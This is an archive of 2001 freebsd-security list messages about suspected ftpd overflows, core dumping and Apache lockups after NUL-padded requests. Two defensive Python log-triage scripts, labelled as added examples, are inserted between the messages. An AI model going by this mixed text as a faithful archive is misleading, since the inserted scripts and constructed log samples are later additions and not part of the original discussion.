Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 3847E37B422 for ; Tue, 22 May 2001 21:45:44 -0700 (PDT) (envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (1461 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 22 May 2001 23:44:23 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Tue, 22 May 2001 23:44:04 -0500 (CDT)
From: James Wyatt
To: Alex
Cc: "Sergey N. Voronkov" , Kris Kennaway , freebsd-security@FreeBSD.ORG
Subject: Re: Is there a ftp vuln in 4.3-STABLE
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Sergey N. Voronkov wrote:
> When I've found this stuff in my logfiles I've changed native ftpd to luke's
> one. Sorry, can't get core to you...
And don't want to setup native daemon > to provide potential hole to someone. > > May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11 > May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11 On Wed, 23 May 2001, Alex replied: > Who owns UID 14 own that machine? Not root I presume. So the > process itself that segmentation faulted wasn't actually executed by root. > Is UID 14 an FTP account for running the daemon? The normal FreeBSD 'ftp' user is uid 14. I'd expect most of the default servers to be running that ID for anonymous file access. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 21:50:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-9.dsl.lsan03.pacbell.net [63.207.60.9]) by hub.freebsd.org (Postfix) with ESMTP id 8B26037B422 for ; Tue, 22 May 2001 21:50:35 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id F0C6166BF7; Tue, 22 May 2001 21:50:34 -0700 (PDT) Date: Tue, 22 May 2001 21:50:34 -0700 From: Kris Kennaway To: "Sergey N. 
Voronkov" Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010522215034.A36060@xor.obsecurity.org> References: <000501c0e316$7deb4450$45d8db40@mhx800> <20010522193952.A33978@xor.obsecurity.org> <20010523100448.A15088@sv.tech.sibitex.tmn.ru> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="sm4nu43k4a2Rpi4c" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010523100448.A15088@sv.tech.sibitex.tmn.ru>; from serg@tmn.ru on Wed, May 23, 2001 at 10:04:48AM +0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --sm4nu43k4a2Rpi4c Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, May 23, 2001 at 10:04:48AM +0600, Sergey N. Voronkov wrote: > On Tue, May 22, 2001 at 07:39:52PM -0700, Kris Kennaway wrote: > > On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote: > > > Is this a FreeBSD specific FTP vulnerability? > > >=20 > > > -Alex > > >=20 > > > On Tue, 22 May 2001, Ryan wrote: > > >=20 > > > > There is an ftp vuln... I do not have any details on it sorry.. Som= e kinda > > > > overflow.. I would run proftpd > >=20 > > No-one has informed the security-officer about any new vulnerability > > in FreeBSD (or for that matter, about third party ftpd ports). It's > > probably worthwhile not flying into a panic until someone actually > > provides some corroborating evidence. > >=20 >=20 > When I'v found this staff in my logfiles I'v change native ftpd to luke's > one. Sorry, can't get core to you... And don't want to setup native daemon > to provide potential hole to someone. 
>=20 > May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11 > May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11 >=20 > Also I have one questtion: how to setup ftpd to allow it dumping core to > specified destination? Use the kern.corefile sysctl Kris --sm4nu43k4a2Rpi4c Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7C0GaWry0BWjoQKURAknjAJ9rCydNeVeCHMDHMOTcG7NJiFPwnwCgvlJn 0FYHr7vjFYu1ra7XLlzbLAM= =Bwza -----END PGP SIGNATURE----- --sm4nu43k4a2Rpi4c-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 21:59:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id 6192C37B424 for ; Tue, 22 May 2001 21:59:09 -0700 (PDT) (envelope-from serg@sbtx.tmn.ru) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.1/8.11.1) with ESMTP id f4N4x7T10593; Wed, 23 May 2001 10:59:07 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.3/8.11.3) id f4N4x7f15413; Wed, 23 May 2001 10:59:07 +0600 (YEKST) (envelope-from serg) Date: Wed, 23 May 2001 10:59:07 +0600 From: "Sergey N. 
Voronkov" To: Alex Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010523105907.A15346@sv.tech.sibitex.tmn.ru> References: <20010523100448.A15088@sv.tech.sibitex.tmn.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from alex@nixfreak.org on Wed, May 23, 2001 at 12:35:15AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Wed, May 23, 2001 at 12:35:15AM -0400, Alex wrote:
> > When I've found this stuff in my logfiles I've changed native ftpd to luke's
> > one. Sorry, can't get core to you... And don't want to set up native daemon
> > to provide potential hole to someone.
> >
> > May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11
> > May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11
>
> Who owns UID 14 on that machine? Not root I presume. So the
> process itself that segmentation faulted wasn't actually executed by root.
> Is UID 14 an FTP account for running the daemon?
>

UID 14 is for FS access only. ftpd is running with root privileges, because
it can't make a new connection from a privileged port (ftp-data, for example)
when it isn't root-privileged. So, any potential hole or buffer overflow in
ftpd is permission for someone to get a root shell onto your ftp server.
A chroot'ed shell, but root's in any case.

About UID 14: It'll be very, very nice if someone can tell me about dumping
core from a seteuid'ed ftpd to ANY specified directory?

Bye, Serg.
From owner-freebsd-security Tue May 22 22: 6:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id 1A8F537B446 for ; Tue, 22 May 2001 22:06:10 -0700 (PDT) (envelope-from serg@sbtx.tmn.ru) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.1/8.11.1) with ESMTP id f4N568T11038; Wed, 23 May 2001 11:06:08 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.3/8.11.3) id f4N568X15464; Wed, 23 May 2001 11:06:08 +0600 (YEKST) (envelope-from serg) Date: Wed, 23 May 2001 11:06:08 +0600 From: "Sergey N. Voronkov" To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010523110608.A15449@sv.tech.sibitex.tmn.ru> References: <000501c0e316$7deb4450$45d8db40@mhx800> <20010522193952.A33978@xor.obsecurity.org> <20010523100448.A15088@sv.tech.sibitex.tmn.ru> <20010522215034.A36060@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010522215034.A36060@xor.obsecurity.org>; from kris@obsecurity.org on Tue, May 22, 2001 at 09:50:34PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

> > Also I have one question: how to set up ftpd to allow it to dump core to a
> > specified destination?
>
> Use the kern.corefile sysctl
>

Many, many thanks! I'll try to set up native ftpd on my work machine and get
the core for the freebsd-team, but it is under about 100 times less load
compared to the ftp server :-(.

Serg.
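An added example, not part of the thread and not FreeBSD code: a small Python triage script for the situation Sergey describes. It parses the "exited on signal N" kernel messages quoted above, flags a daemon that keeps dying on SIGSEGV or SIGBUS (for a daemon that still holds root, the usual trace an overflow attempt leaves when the payload does not work), lists which of those exits wrote no core file (the kernel appends "(core dumped)" to the message when it did, and the two ftpd lines carry no such suffix), and expands a kern.corefile template (%N is the process name, %P the pid, %U the uid) to the path a core would get once dumps are enabled. Two caveats the script's output points at: the uid in the kernel message is the effective uid at the time of the crash, so "uid 14" says nothing about whether the process could regain root; and a process that has changed credentials, as ftpd has after seteuid, will not dump at all until kern.sugid_coredump is also enabled, so kern.corefile by itself does not cover Sergey's case. The sample log is constructed; only its first two lines are the ones quoted in the thread.

```python
import re
from collections import Counter

# Constructed sample of /var/log/messages lines. The first two are the kernel
# messages quoted in this thread; the rest are made up in the same format to
# exercise the script. The kernel appends " (core dumped)" when it actually
# wrote a core file; the ftpd lines have no such suffix.
SAMPLE_LOG = """\
May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11
May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11
May 17 21:05:02 ftp /kernel: pid 11203 (perl), uid 1001: exited on signal 11 (core dumped)
May 18 03:12:45 ftp /kernel: pid 11980 (httpd), uid 80: exited on signal 15
May 18 09:41:10 ftp /kernel: pid 12411 (ftpd), uid 14: exited on signal 10
May 18 09:41:11 ftp ftpd[12412]: connection from 192.0.2.77
"""

CRASH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) /kernel: "
    r"pid (?P<pid>\d+) \((?P<prog>[^)]+)\), uid (?P<uid>\d+): "
    r"exited on signal (?P<sig>\d+)(?P<core> \(core dumped\))?$"
)

SIGNAMES = {4: "SIGILL", 6: "SIGABRT", 8: "SIGFPE", 10: "SIGBUS", 11: "SIGSEGV", 15: "SIGTERM"}
# SIGBUS and SIGSEGV mean the process touched memory it should not have; for a
# network daemon that is the usual trace of an overflow attempt that did not work.
MEMORY_FAULTS = {10, 11}


def parse_crashes(text):
    """One dict per 'exited on signal' line; unrelated lines are skipped."""
    crashes = []
    for line in text.splitlines():
        m = CRASH_RE.match(line)
        if not m:
            continue
        crashes.append({
            "ts": m.group("ts"),
            "host": m.group("host"),
            "pid": int(m.group("pid")),
            "prog": m.group("prog"),
            "uid": int(m.group("uid")),      # effective uid at exit, not the real uid
            "sig": int(m.group("sig")),
            "core": m.group("core") is not None,
        })
    return crashes


def suspicious(crashes, threshold=2):
    """(prog, uid) pairs that died on a memory fault at least `threshold` times."""
    counts = Counter((c["prog"], c["uid"]) for c in crashes if c["sig"] in MEMORY_FAULTS)
    return sorted(key for key, n in counts.items() if n >= threshold)


def missing_cores(crashes):
    """Memory-fault exits for which the kernel wrote no core file."""
    return [c for c in crashes if c["sig"] in MEMORY_FAULTS and not c["core"]]


def expand_corefile(template, prog, pid, uid):
    """Expand the %N (process name), %P (pid) and %U (uid) tokens of a
    kern.corefile template to the path a core for this process would get."""
    return template.replace("%N", prog).replace("%P", str(pid)).replace("%U", str(uid))


def report(text, corefile_template="%N.core"):
    """Human-readable summary: one line per crash, then warnings and notes."""
    crashes = parse_crashes(text)
    out = []
    for c in crashes:
        name = SIGNAMES.get(c["sig"], "signal %d" % c["sig"])
        where = expand_corefile(corefile_template, c["prog"], c["pid"], c["uid"]) if c["core"] else "none"
        out.append("%s %s pid=%d uid=%d %s core=%s" % (c["ts"], c["prog"], c["pid"], c["uid"], name, where))
    for prog, uid in suspicious(crashes):
        out.append("WARNING: %s (uid %d) died on a memory fault more than once" % (prog, uid))
    for c in missing_cores(crashes):
        out.append("NOTE: pid %d (%s) left no core; check kern.corefile and, for a "
                   "process that changed credentials, kern.sugid_coredump" % (c["pid"], c["prog"]))
    return "\n".join(out)


if __name__ == "__main__":
    print(report(SAMPLE_LOG, "/var/crash/%N.%P.core"))
```

Feed it the real /var/log/messages with report(open(path).read(), template) where template is the current value of the kern.corefile sysctl; the default "%N.core" drops the core in the process's working directory, which for a chroot'ed ftpd is somewhere under the ftp tree, so an absolute template such as /var/crash/%N.%P.core is what you want before trying to reproduce the crash.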
From owner-freebsd-security Tue May 22 22:37:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-9.dsl.lsan03.pacbell.net [63.207.60.9]) by hub.freebsd.org (Postfix) with ESMTP id CC5AB37B424 for ; Tue, 22 May 2001 22:37:49 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0533266B5F; Tue, 22 May 2001 22:37:48 -0700 (PDT) Date: Tue, 22 May 2001 22:37:48 -0700 From: Kris Kennaway To: "Sergey N. Voronkov" Cc: Alex , Kris Kennaway , freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010522223748.A36767@xor.obsecurity.org> References: <20010523100448.A15088@sv.tech.sibitex.tmn.ru> <20010523105907.A15346@sv.tech.sibitex.tmn.ru> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="wRRV7LY7NUeQGEoC" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010523105907.A15346@sv.tech.sibitex.tmn.ru>; from serg@tmn.ru on Wed, May 23, 2001 at 10:59:07AM +0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

--wRRV7LY7NUeQGEoC
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Wed, May 23, 2001 at 10:59:07AM +0600, Sergey N. Voronkov wrote:
> About UID 14: It'll be very, very nice if someone can tell me about dumping
> core from a seteuid'ed ftpd to ANY specified directory?
kern.corefile
kern.sugid_coredump

Kris

--wRRV7LY7NUeQGEoC
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.5 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7C0ysWry0BWjoQKURAiaKAJ9J3vFqCjyPrS5qLzI3sIhx2lwdwwCgyAny
M0g1X5OWyJ6QeqkSIQRlw/8=
=eaq9
-----END PGP SIGNATURE-----

--wRRV7LY7NUeQGEoC--

From owner-freebsd-security Tue May 22 23:54:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from euphoria.digitalextreme.org (euphoria.digitalextreme.org [204.212.149.31]) by hub.freebsd.org (Postfix) with SMTP id BA10D37B424 for ; Tue, 22 May 2001 23:54:21 -0700 (PDT) (envelope-from subscribed@de-net.org) Received: (qmail 16108 invoked by uid 504); 22 May 2001 23:49:52 -0000 Received: from unknown (HELO extremist) (204.212.149.57) by euphoria.digitalextreme.org with SMTP; 22 May 2001 23:49:52 -0000 From: "Dan Graaff" To: "Robert Clark" , "Olivier Nicole" Cc: , , Subject: RE: Qmail + FreeBSD 4.3 -- resolved Date: Tue, 22 May 2001 23:53:31 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <20010522193427.A20063@darkstar.gte.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Thanks for the advice everyone, but it looks like the problem just recently
came out on the vpopmail site! (today in fact)... http://inter7.com/vpopmail/
They completely re-wrote vdelivermail.. but I think I'm going to wait for a
stable release..
just deal with pages of vdelivermail exit 11's

Thanks,
-Dan Graaff / Digital
The DE-Network

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Robert Clark
Sent: Tuesday, May 22, 2001 7:34 PM
To: Olivier Nicole
Cc: veldy@veldy.net; glassfish@frogbox.dyndns.org; freebsd-security@FreeBSD.ORG
Subject: Re: Qmail + FreeBSD 4.3

Or it fails some number of years later, when you power it on. [RC]

On Wed, May 23, 2001 at 07:58:31AM +0700, Olivier Nicole wrote:
> Hi,
>
> As a good rule, hardware fails in the first hour after turning the
> power on for the first time, or it will fail some months/years later.
>
> Like anything, hardware does wear out; let's say your CPU fan slightly
> slows down, it means CPU heat increases. Memory and card connectors are
> subjected to vibrations, even if not perceptible to humans, so the
> contacts get oxidized. Examples could be multiple; it is not just
> disk motors that fail.
>
> Best regards,
>
> olivier
>
> > Well, bad hardware is less likely than it trying to overwrite memory it
> > doesn't own. If he is being attacked, and it is a buffer overflow exploit,
> > then overwriting memory it doesn't own is more likely than it being
> > repeatedly hardware, especially after his system has been working fine all
> > this time.
From owner-freebsd-security Wed May 23 1: 1: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from mout0.freenet.de (mout0.freenet.de [194.97.50.131]) by hub.freebsd.org (Postfix) with ESMTP id 91F2137B43C for ; Wed, 23 May 2001 01:00:58 -0700 (PDT) (envelope-from michael.radzewitz@freenet-ag.de) Received: from [194.97.50.144] (helo=mx1.freenet.de) by mout0.freenet.de with esmtp (Exim 3.22 #1) id 152TZh-0008On-00 for security@freebsd.org; Wed, 23 May 2001 10:00:57 +0200 Received: from staff.freenet-ag.de ([62.104.227.5]) by mx1.freenet.de with esmtp (Exim 3.22 #1) id 152TZh-00074a-00 for security@freebsd.org; Wed, 23 May 2001 10:00:57 +0200 Received: by staff.freenet-ag.de with Internet Mail Service (5.5.2653.19) id ; Wed, 23 May 2001 10:00:56 +0200 Message-ID: From: Michael Radzewitz To: "'security@freebsd.org'" Subject: RE: apache_logs/system hang up Date: Wed, 23 May 2001 10:00:46 +0200 X-Mailer: Internet Mail Service (5.5.2653.19) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hello Marc,

the system wasn't able to do anything, so I had to reset it by hand.
Tonight the same thing happened. Actually I would think there must be
something wrong on my site. The characters contain nothing else
than hundreds of these: ^@^@^@
They do not look like a typical binary file. It's always the same
corner of the internet which one of my users visits and which causes the
trouble one minute later.
Today I plugged a monitor in to see what happened and I got the message:

login: unable to login

followed by a kernel panic and the normal core dump output of a linux
system.

As I mentioned before I think there is something wrong on my site
but I am a little bit concerned about the "unable to login" message.
I will monitor this problem until the end of the week - maybe I get some
more information about it. Later on I will swap the system to FreeBSD.

Thanks
Michael

> -----Original Message-----
> From: Marc Rogers [mailto:marcr@shady.org]
> Sent: Wednesday, 23 May 2001 00:55
> To: Michael Radzewitz
> Subject: Re: apache_logs/system hang up
>
> When you mean hang, do you mean that it was unresponsive,
> or do you mean that you actually tried to get a response from
> a console keyboard?
>
> In my experience an attack is more likely to suck resources from
> a system, making it unresponsive, or very very slow to respond.
>
> A complete lockup is most often caused by a hardware issue.
>
> When you mention "non ascii" characters, do you mean special
> ascii characters, such as ^@ ^M ï Ä etc? Was it a similar
> effect to reading a binary file?
>
> Marc Rogers
> Technical Director
> European Data Corporation
>
> On Tue, May 22, 2001 at 05:13:35PM +0200, Michael Radzewitz wrote:
> > Hello,
> >
> > I have posted this question before without a subject.
> > Sorry for that and please ignore the last mail.
> >
> > Once again...
> >
> > ...a short question because I am concerned about a log entry
> > in the apache access and error logs.
> >
> > Last night I had to reset my system because it hung.
> > Today I've found two entries in the logfiles mentioned
> > above. They contain lots of non-ASCII characters.
> > I am not able to get some more information about the
> > content. For me it seems to be binary code.
> >
> > The log entry looks something like this
> >
> > lots of: ^@^@^@ttp://www.
> > followed by the address
> > |
> > |
> > my editor
> > displays it like this (vim)
> >
> > I'm wondering if it's possible to send such information over the
> > http-protocol which causes the apache and the rest of the system to
> > hang up or maybe it's just a hang up because god knows what went
> > wrong at that time with the hard or software.
> >
> > Maybe one of you had the same problem or any other idea.
> >
> > Thanks in advance
> >
> > Michael

From owner-freebsd-security Wed May 23 1:37:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from kalaid.f2f.com.ua (kalaid.f2f.com.ua [62.149.0.33]) by hub.freebsd.org (Postfix) with ESMTP id D63F037B424 for ; Wed, 23 May 2001 01:37:05 -0700 (PDT) (envelope-from never@mail.uic-in.net) Received: from mail.uic-in.net (root@[212.35.189.4]) by kalaid.f2f.com.ua (8.11.3/8.11.1) with ESMTP id f4N8cna86135; Wed, 23 May 2001 11:39:02 +0300 (EEST) (envelope-from never@mail.uic-in.net) Received: (from never@localhost) by mail.uic-in.net (8.11.3/8.11.3) id f4N8ajG19230; Wed, 23 May 2001 11:36:46 +0300 (EEST) (envelope-from never) Date: Wed, 23 May 2001 11:36:45 +0300 From: "Alexandr P. Kovalenko" To: Michael Radzewitz Cc: "'security@freebsd.org'" Subject: Re: apache_logs/system hang up Message-ID: <20010523113645.A19181@uic-in.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from michael.radzewitz@freenet-ag.de on Wed, May 23, 2001 at 10:00:46AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hello, Michael Radzewitz!
On Wed, May 23, 2001 at 10:00:46AM +0200, you wrote:

> Hello Marc,
>
> the system wasn't able to do anything, so I had to reset it by hand.
> Tonight the same thing happened. Actually I would think there must be
> something wrong on my site. The characters contain nothing else
> than hundreds of these: ^@^@^@
> They do not look like a typical binary file. It's always the same
> corner of the internet which one of my users visits and which causes the
> trouble one minute later.
>
> Today I plugged a monitor in to see what happened and I got the message:
>
> login: unable to login
>
> followed by a kernel panic and the normal core dump output of a linux
> system.
>
> As I mentioned before I think there is something wrong on my site
> but I am a little bit concerned about the "unable to login" message.
> I will monitor this problem until the end of the week - maybe I get some
> more information about it. Later on I will swap the system to FreeBSD.

Sorry, what apache versions are you running and what are uname -a's?

/me has a similar situation: periodically the machine locks up.
When at the last second I'm able to run top, I see that swap is filled and
apache is about 350MB.... Maybe it is a common problem/security issue.

--
NEVE-RIPE
ICQ: 36925929 http://www.nevermind.kiev.ua/
Powered by caffeine. Made with beer.
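An added example, not from the thread: a Python scanner for the access-log symptom Michael describes, written to separate what the log actually shows (a request field padded with hundreds of NUL bytes and ending in a URL fragment) from what is still unknown (why the box locks up a minute later). It reads Common Log Format lines as bytes, so no decoding step can alter or drop the NULs, and for each suspicious request reports the client address, the status Apache returned, the longest NUL run and the printable fragments, the way strings(1) would show them. That is enough to find out who sends these requests, block them at the firewall, and check whether the lockups line up with them in time. The log lines and the 192.0.2.x addresses are constructed for the example.

```python
import re
import string

# Constructed sample access_log in Common Log Format. The third entry imitates
# the lines described in the thread: a request field made of hundreds of NUL
# bytes followed by a fragment of a URL. The 192.0.2.x addresses are from the
# documentation range, not real clients.
SAMPLE_ACCESS_LOG = (
    b'192.0.2.10 - - [22/May/2001:23:58:01 +0200] "GET /index.html HTTP/1.0" 200 1534\n'
    b'192.0.2.11 - - [22/May/2001:23:58:07 +0200] "GET /images/logo.gif HTTP/1.0" 200 8810\n'
    b'192.0.2.99 - - [22/May/2001:23:59:12 +0200] "'
    + b"\x00" * 300
    + b'ttp://www.example.net/" 400 0\n'
    b'192.0.2.12 - - [23/May/2001:00:01:44 +0200] "POST /cgi-bin/form HTTP/1.0" 200 212\n'
)

# host ident authuser [date] "request" status bytes; the request group is
# non-greedy so an embedded quote or NUL does not break the match.
CLF_RE = re.compile(
    rb'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>.*?)" '
    rb'(?P<status>\d{3}) (?P<size>\S+)$',
    re.DOTALL,
)

# Bytes treated as printable when extracting fragments: 7-bit ASCII text and
# the space character, but no control characters.
PRINTABLE = set(string.printable.encode("ascii")) - set(b"\t\n\r\x0b\x0c")


def longest_nul_run(data):
    """Length of the longest run of consecutive NUL (0x00) bytes in data."""
    run = best = 0
    for b in data:
        run = run + 1 if b == 0 else 0
        best = max(best, run)
    return best


def printable_fragments(data, min_len=4):
    """Printable ASCII substrings of at least min_len bytes, like strings(1)."""
    out, cur = [], bytearray()
    for b in data + b"\x00":  # the sentinel flushes the last fragment
        if b in PRINTABLE:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                out.append(cur.decode("ascii"))
            cur = bytearray()
    return out


def scan_access_log(data, nul_threshold=8):
    """One finding per log line whose request carries >= nul_threshold NULs.

    A line that does not parse as CLF at all is checked as a whole, since a
    request that corrupted the log format is itself worth a look.
    """
    findings = []
    for raw in data.split(b"\n"):
        if not raw:
            continue
        m = CLF_RE.match(raw)
        if m:
            client = m.group("client").decode("ascii", "replace")
            field = m.group("request")
            status = int(m.group("status"))
        else:
            client, field, status = None, raw, None
        run = longest_nul_run(field)
        if run >= nul_threshold:
            findings.append({
                "client": client,
                "status": status,
                "nul_run": run,
                "request_len": len(field),
                "fragments": printable_fragments(field),
            })
    return findings


def report(data, nul_threshold=8):
    """One text line per finding, for reading or piping into grep."""
    lines = []
    for f in scan_access_log(data, nul_threshold):
        lines.append("client=%s status=%s request_len=%d nul_run=%d fragments=%s" % (
            f["client"], f["status"], f["request_len"], f["nul_run"], f["fragments"]))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_ACCESS_LOG))
```

Run it over the real file with report(open("/var/log/httpd/access_log", "rb").read()); the threshold of eight NUL bytes is arbitrary, chosen to skip the odd stray control character while still catching the padded requests from the thread. Note that the script only tells you who sent the requests and what they contained; whether they are the cause of the lockup or merely the last thing logged before it is a separate question that needs the console or a kernel crash dump.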
From owner-freebsd-security Wed May 23 2:38:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from mout1.freenet.de (mout1.freenet.de [194.97.50.132]) by hub.freebsd.org (Postfix) with ESMTP id ABDF337B43C for ; Wed, 23 May 2001 02:38:29 -0700 (PDT) (envelope-from michael.radzewitz@freenet-ag.de) Received: from [194.97.50.144] (helo=mx1.freenet.de) by mout1.freenet.de with esmtp (Exim 3.22 #1) id 152V64-00014S-00 for security@freebsd.org; Wed, 23 May 2001 11:38:28 +0200 Received: from staff.freenet-ag.de ([62.104.227.5]) by mx1.freenet.de with esmtp (Exim 3.22 #1) id 152V64-0001Al-00 for security@freebsd.org; Wed, 23 May 2001 11:38:28 +0200 Received: by staff.freenet-ag.de with Internet Mail Service (5.5.2653.19) id ; Wed, 23 May 2001 11:38:26 +0200 Message-ID: From: Michael Radzewitz To: "'security@freebsd.org'" Subject: RE: apache_logs/system hang up Date: Wed, 23 May 2001 11:38:18 +0200 X-Mailer: Internet Mail Service (5.5.2653.19) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hello Alexandr,

currently the system is running under Red Hat Linux 6.2
with kernel 2.2.14-5.0 and apache 1.3.14 on an Intel i686.

I'll try to reproduce this error. I think it's a security
issue and should be discussed when an abnormal http-request
is able to stop a running system.

> -----Original Message-----
> From: Alexandr P. Kovalenko [mailto:never@uic-in.net]
> Sent: Wednesday, 23 May 2001 10:37
> To: Michael Radzewitz
> Cc: 'security@freebsd.org'
> Subject: Re: apache_logs/system hang up
>
> Hello, Michael Radzewitz!
>
> On Wed, May 23, 2001 at 10:00:46AM +0200, you wrote:
>
> > Hello Marc,
> >
> > the system wasn't able to do anything, so I had to reset it by hand.
> > Tonight the same thing happened.
> > Actually I would think there must be
> > something wrong on my site. The characters contain nothing else
> > than hundreds of these: ^@^@^@
> > They do not look like a typical binary file. It's always the same
> > corner of the internet which one of my users visits and which causes the
> > trouble one minute later.
> >
> > Today I plugged a monitor in to see what happened and I got the message:
> >
> > login: unable to login
> >
> > followed by a kernel panic and the normal core dump output of a linux
> > system.
> >
> > As I mentioned before I think there is something wrong on my site
> > but I am a little bit concerned about the "unable to login" message.
> > I will monitor this problem until the end of the week - maybe I get some
> > more information about it. Later on I will swap the system to FreeBSD.
>
> Sorry, what apache versions are you running and what are uname -a's?
>
